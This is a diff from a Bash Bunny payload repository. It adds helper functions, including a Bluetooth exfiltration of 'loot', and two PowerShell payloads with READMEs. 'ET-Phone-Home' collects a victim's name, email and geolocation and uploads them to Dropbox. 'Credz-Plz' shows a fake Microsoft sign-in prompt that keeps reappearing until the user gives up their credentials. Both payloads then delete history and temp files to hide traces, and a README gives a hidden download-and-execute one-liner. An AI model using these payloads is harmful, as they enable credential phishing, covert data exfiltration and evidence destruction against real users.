"1": "00,00,1e",
|
||||
"!": "02,00,1e",
|
||||
"2": "00,00,1f",
|
||||
"@": "40,00,14",
|
||||
"3": "00,00,20",
|
||||
"#": "40,00,20",
|
||||
"4": "00,00,21",
|
||||
"$": "40,00,21",
|
||||
"5": "00,00,22",
|
||||
"%": "02,00,22",
|
||||
"6": "00,00,23",
|
||||
"^": "02,00,20",
|
||||
"7": "00,00,24",
|
||||
"&": "02,00,23",
|
||||
"8": "00,00,25",
|
||||
"*": "00,00,2d",
|
||||
"9": "00,00,26",
|
||||
"(": "02,00,25",
|
||||
"0": "00,00,27",
|
||||
")": "02,00,26",
|
||||
"ENTER": "00,00,28",
|
||||
"ESC": "00,00,29",
|
||||
"ESCAPE": "00,00,29",
|
||||
"BACKSPACE": "00,00,2a",
|
||||
"TAB": "00,00,2b",
|
||||
"ALT-TAB": "04,00,2b",
|
||||
"SPACE": "00,00,2c",
|
||||
" ": "00,00,2c",
|
||||
"-": "00,00,2e",
|
||||
"_": "02,00,2e",
|
||||
"=": "02,00,27",
|
||||
"+": "02,00,21",
|
||||
"[": "40,00,25",
|
||||
"{": "40,00,24",
|
||||
"]": "40,00,26",
|
||||
"}": "40,00,27",
|
||||
"\\": "40,00,2d",
|
||||
"|": "40,00,2e",
|
||||
";": "02,00,31",
|
||||
":": "02,00,38",
|
||||
"'": "02,00,1f",
|
||||
"\"": "00,00,35",
|
||||
"`": "40,00,31",
|
||||
"~": "40,00,30",
|
||||
",": "00,00,31",
|
||||
"<": "40,00,35",
|
||||
".": "00,00,38",
|
||||
">": "40,00,1e",
|
||||
"/": "02,00,24",
|
||||
"?": "02,00,2d",
|
||||
"CAPSLOCK": "00,00,39",
|
||||
"F1": "00,00,3a",
|
||||
"F2": "00,00,3b",
|
||||
"F3": "00,00,3c",
|
||||
"F4": "00,00,3d",
|
||||
"F5": "00,00,3e",
|
||||
"F6": "00,00,3f",
|
||||
"F7": "00,00,40",
|
||||
"F8": "00,00,41",
|
||||
"F9": "00,00,42",
|
||||
"F10": "00,00,43",
|
||||
"F11": "00,00,44",
|
||||
"F12": "00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK": "00,00,47",
|
||||
"PAUSE": "00,00,48",
|
||||
"BREAK": "00,00,48",
|
||||
"INSERT": "00,00,49",
|
||||
"HOME": "00,00,4a",
|
||||
"PAGEUP": "00,00,4b",
|
||||
"DELETE": "00,00,4c",
|
||||
"DEL": "00,00,4c",
|
||||
"END": "00,00,4d",
|
||||
"PAGEDOWN": "00,00,4e",
|
||||
"RIGHTARROW": "00,00,4f",
|
||||
"RIGHT": "00,00,4f",
|
||||
"LEFTARROW": "00,00,50",
|
||||
"LEFT": "00,00,50",
|
||||
"DOWNARROW": "00,00,51",
|
||||
"DOWN": "00,00,51",
|
||||
"UPARROW": "00,00,52",
|
||||
"UP": "00,00,52",
|
||||
"NUMLOCK": "00,00,53",
|
||||
"MENU": "00,00,65",
|
||||
"APP": "00,00,65"
|
||||
}
|
|
@ -0,0 +1,16 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# BLE_EXFIL v1 by @drapl0n
|
||||
# Exfiltrate data(25 bytes) stored in "/loot/ble_exfil.txt" via BLE.
|
||||
# Usage: BLE_EXFIL
|
||||
|
||||
function BLE_EXFIL() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
text=$(cat /root/udisk/loot/ble_exfil.txt)
|
||||
exfil=${text:0:25}
|
||||
echo -n -e "AT+ADVDAT=$exfil" > /dev/ttyS1
|
||||
}
|
||||
|
||||
export -f BLE_EXFIL
|
|
@ -26,6 +26,10 @@ function GET() {
|
|||
[[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return
|
||||
export TARGET_OS='UNKNOWN'
|
||||
;;
|
||||
"BB_LABEL")
|
||||
export BB_LABEL=$(ls -l /dev/disk/by-label/ | awk '/nandf$/ { print $9 }')
|
||||
;;
|
||||
|
||||
esac
|
||||
}
|
||||
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# LINUX_MOUNT v1 by @drapl0n
|
||||
# Auto mounts BashBunny on GNU/Linux systems.
|
||||
# NOTE: Mount path is stored in variable "lmnt".
|
||||
# Usage: LINUX_MOUNT - to automatically mount BashBunny.
|
||||
# LINUX_UMOUNT - to unmount mounted BashBunny.
|
||||
|
||||
function LINUX_MOUNT() {
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
Q STRING udisksctl mount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
}
|
||||
function LINUX_UMOUNT() {
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
}
|
||||
export -f LINUX_MOUNT LINUX_UMOUNT
|
|
@ -1,9 +1,8 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# WAIT v1 by @Hak5Darren
|
||||
# Waits blocks the payload from continuing until the switch position has changed
|
||||
# Pauses payload until the switch position has changed
|
||||
# Usage: WAIT
|
||||
|
||||
function WAIT() {
|
||||
GET SWITCH_POSITION
|
||||
TEST=$SWITCH_POSITION
|
||||
|
@ -13,5 +12,43 @@ function WAIT() {
|
|||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAIT
|
||||
|
||||
|
||||
# WAIT_FOR_LOOT v1 by Korben
|
||||
# WAIT_FOR_LOOT <file_path> (optional)<refresh interval in seconds>
|
||||
#
|
||||
# Example: WAIT_FOR_LOOT /root/loot/captured_keys.txt
|
||||
# Will return once /root/loot/captured_keys.txt exists
|
||||
# OR IF FILE ALREADY EXISTS
|
||||
# Will return once the file line count has increased
|
||||
|
||||
function WAIT_FOR_LOOT() {
|
||||
# Check for refresh interval override
|
||||
if [ -z "${2}" ]; then
|
||||
REFRESH_INTERVAL=1
|
||||
else
|
||||
REFRESH_INTERVAL=$2
|
||||
fi
|
||||
|
||||
if [ -f "${1}" ]; then
|
||||
# If file already exists wait for it to change size
|
||||
start_count=$(cat $1|wc -l)
|
||||
while [ $(cat $1|wc -l) -eq $start_count ]; do
|
||||
sleep $REFRESH_INTERVAL
|
||||
done
|
||||
else
|
||||
# File doesn't exist, wait for it to be created
|
||||
while [ ! -f "${1}" ]; do
|
||||
sleep $REFRESH_INTERVAL
|
||||
done
|
||||
fi
|
||||
}
|
||||
export -f WAIT_FOR_LOOT
|
||||
|
||||
# WAIT_FOR_TARGET_IP v1 by Hak5Darren
|
||||
# Pauses payload until target receives IP address
|
||||
function WAIT_FOR_TARGET_IP() {
|
||||
until [ ! -z $(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) ]; do sleep 1; done
|
||||
}
|
||||
export -f WAIT_FOR_TARGET_IP
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# WAIT_FOR_NOTPRESENT v1 by @Hak5Darren
|
||||
# Pauses payload execution until specified bluetooth identifier IS NOT present
|
||||
# Usage: WAIT_FOR_NOTPRESENT devicename
|
||||
|
||||
function WAIT_FOR_NOTPRESENT() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
echo -n -e "AT+ROLE=2" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
while true; do
|
||||
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
|
||||
if grep -qao $1 /tmp/bt_observation; then
|
||||
echo "$1 found"
|
||||
else
|
||||
break
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAIT_FOR_NOTPRESENT
|
|
@ -0,0 +1,23 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# WAIT_FOR_PRESENT v1 by @Hak5Darren
|
||||
# Pauses payload execution until specified bluetooth identifier IS present
|
||||
# Usage: WAIT_FOR_PRESENT devicename
|
||||
|
||||
function WAIT_FOR_PRESENT() {
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
echo -n -e "AT+ROLE=2" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
while true; do
|
||||
timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
|
||||
if grep -qao $1 /tmp/bt_observation; then
|
||||
break
|
||||
else
|
||||
echo "$1 not found"
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
export -f WAIT_FOR_PRESENT
|
|
@ -0,0 +1,154 @@
|
|||
|
||||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Incident-Response | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
|
||||
|
||||
.DESCRIPTION
|
||||
This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
|
||||
This script will get the Name and email associated with the targets microsoft account
|
||||
Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
|
||||
#>
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
|
||||
|
||||
# Your dropbox access token to exfiltrate information to
|
||||
|
||||
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-fullName {
|
||||
|
||||
try {
|
||||
|
||||
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
|
||||
|
||||
}
|
||||
|
||||
# If no name is detected function will return $env:UserName
|
||||
|
||||
# Write Error is just for troubleshooting
|
||||
catch {Write-Error "No name was detected"
|
||||
return $env:UserName
|
||||
-ErrorAction SilentlyContinue
|
||||
}
|
||||
|
||||
return $fullName
|
||||
|
||||
}
|
||||
|
||||
$FN = Get-fullName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-email {
|
||||
|
||||
try {
|
||||
|
||||
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
|
||||
return $email
|
||||
}
|
||||
|
||||
# If no email is detected function will return backup message for sapi speak
|
||||
|
||||
# Write Error is just for troubleshooting
|
||||
catch {Write-Error "An email was not found"
|
||||
return "No Email Detected"
|
||||
-ErrorAction SilentlyContinue
|
||||
}
|
||||
}
|
||||
|
||||
$EM = Get-email
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Get-GeoLocation{
|
||||
try {
|
||||
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
|
||||
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
|
||||
$GeoWatcher.Start() #Begin resolving current locaton
|
||||
|
||||
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
|
||||
Start-Sleep -Milliseconds 100 #Wait for discovery.
|
||||
}
|
||||
|
||||
if ($GeoWatcher.Permission -eq 'Denied'){
|
||||
Write-Error 'Access Denied for Location Information'
|
||||
} else {
|
||||
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
|
||||
}
|
||||
}
|
||||
# Write Error is just for troubleshooting
|
||||
catch {Write-Error "No coordinates found"
|
||||
return "No Coordinates found"
|
||||
-ErrorAction SilentlyContinue
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
$GL = Get-GeoLocation
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
echo $FN >> $env:TMP\$FileName
|
||||
echo $EM >> $env:TMP\$FileName
|
||||
echo $GL >> $env:TMP\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
# Upload output file to dropbox
|
||||
|
||||
$TargetFilePath="/$FileName"
|
||||
$SourceFilePath="$env:TMP\$FileName"
|
||||
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
||||
$authorization = "Bearer " + $DropBoxAccessToken
|
||||
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
||||
$headers.Add("Authorization", $authorization)
|
||||
$headers.Add("Dropbox-API-Arg", $arg)
|
||||
$headers.Add("Content-Type", 'application/octet-stream')
|
||||
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Delete run box history
|
||||
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Deletes contents of recycle bin
|
||||
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
|
@ -0,0 +1,117 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# ET Phone Home
|
||||
|
||||
A script I put together to locate your stolen devices, or your "stolen" baited devices
|
||||
|
||||
## Description
|
||||
|
||||
This program is meant to locate your devices. When someone plugs it into their computer
|
||||
Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
|
||||
latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
|
||||
Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox - Your Shared link for the intended file
|
||||
* Windows 7,10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Your device is plugged into the targets computer
|
||||
* A one liner command in the run box will execute the script on the bash bunny
|
||||
Something Like What you see below will be in your loot folder:
|
||||
|
||||
NAME
|
||||
|
||||
EMAIL
|
||||
|
||||
LATITUDE AND LONGITUDE
|
||||
|
||||
```
|
||||
Jakoby
|
||||
|
||||
jakoby@example.com
|
||||
|
||||
Latitude Longitude
|
||||
-------- ---------
|
||||
37.778919 -122.416313
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
Kalani
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-ET-Phone-Home)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
@ -0,0 +1,22 @@
|
|||
# Title: ET-Phone-Home
|
||||
# Description: this script will download and execute your locator script to find your device when it is plugged in
|
||||
# Author: I am Jakoby
|
||||
# Version: 1.0
|
||||
# Category: Incident_Response
|
||||
# Attackmodes: HID, Storage
|
||||
# Target: Windows 10, 11
|
||||
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ET-Phone-Home.ps1')"
|
||||
QUACK ENTER
|
|
@ -0,0 +1,178 @@
|
|||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
|
||||
|
||||
.DESCRIPTION
|
||||
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
|
||||
This will be followed by a fake authentication ui prompt.
|
||||
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
|
||||
Once the target enters their credentials their information will be uploaded to your Bash Bunny
|
||||
|
||||
#>
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
# Creating loot folder
|
||||
|
||||
# Get Drive Letter
|
||||
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
|
||||
|
||||
# Test if directory exists if not create directory in loot folder to store file
|
||||
$TARGETDIR = "$bb\loot\Credz-Plz\$env:computername"
|
||||
|
||||
if(!(Test-Path -Path $TARGETDIR )){
|
||||
mkdir $TARGETDIR
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to generate the ui.prompt you will use to harvest their credentials
|
||||
#>
|
||||
|
||||
function Get-Creds {
|
||||
do{
|
||||
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
|
||||
if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
|
||||
[System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
|
||||
Get-Creds
|
||||
}
|
||||
$creds = $cred.GetNetworkCredential() | fl
|
||||
return $creds
|
||||
# ...
|
||||
|
||||
$done = $true
|
||||
} until ($done)
|
||||
|
||||
}
|
||||
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to pause the script until a mouse movement is detected
|
||||
#>
|
||||
|
||||
function Pause-Script{
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
|
||||
$o=New-Object -ComObject WScript.Shell
|
||||
|
||||
while (1) {
|
||||
$pauseTime = 3
|
||||
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
|
||||
break
|
||||
}
|
||||
else {
|
||||
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
|
||||
#>
|
||||
|
||||
function Caps-Off {
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
|
||||
|
||||
#If true, toggle CapsLock key, to ensure that the script doesn't fail
|
||||
if ($caps -eq $true){
|
||||
|
||||
$key = New-Object -ComObject WScript.Shell
|
||||
$key.SendKeys('{CapsLock}')
|
||||
}
|
||||
}
|
||||
#----------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
|
||||
#>
|
||||
|
||||
Pause-Script
|
||||
|
||||
Caps-Off
|
||||
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
|
||||
[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account")
|
||||
|
||||
$creds = Get-Creds
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to save the gathered credentials to a file in the temp directory
|
||||
#>
|
||||
|
||||
echo $creds >> $env:TMP\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This exfiltrates your loot to the Bash Bunny
|
||||
#>
|
||||
|
||||
Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
|
||||
|
||||
#------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
<#
|
||||
|
||||
.NOTES
|
||||
This is to clean up behind you and remove any evidence to prove you were there
|
||||
#>
|
||||
|
||||
# Delete contents of Temp folder
|
||||
|
||||
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Delete run box history
|
||||
|
||||
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
|
||||
# Delete powershell history
|
||||
|
||||
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
|
||||
# Deletes contents of recycle bin
|
||||
|
||||
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||
|
|
@ -0,0 +1,102 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# Credz-Plz
|
||||
|
||||
A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
|
||||
|
||||
## Description
|
||||
|
||||
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
|
||||
This will be followed by a fake authentication ui prompt.
|
||||
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
|
||||
Once the target enters their credentials their information will be uploaded to your dropbox for collection
|
||||
|
||||
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg)
|
||||
|
||||
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg)
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox or other file sharing service - Your Shared link for the intended file
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||
```
|
||||
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
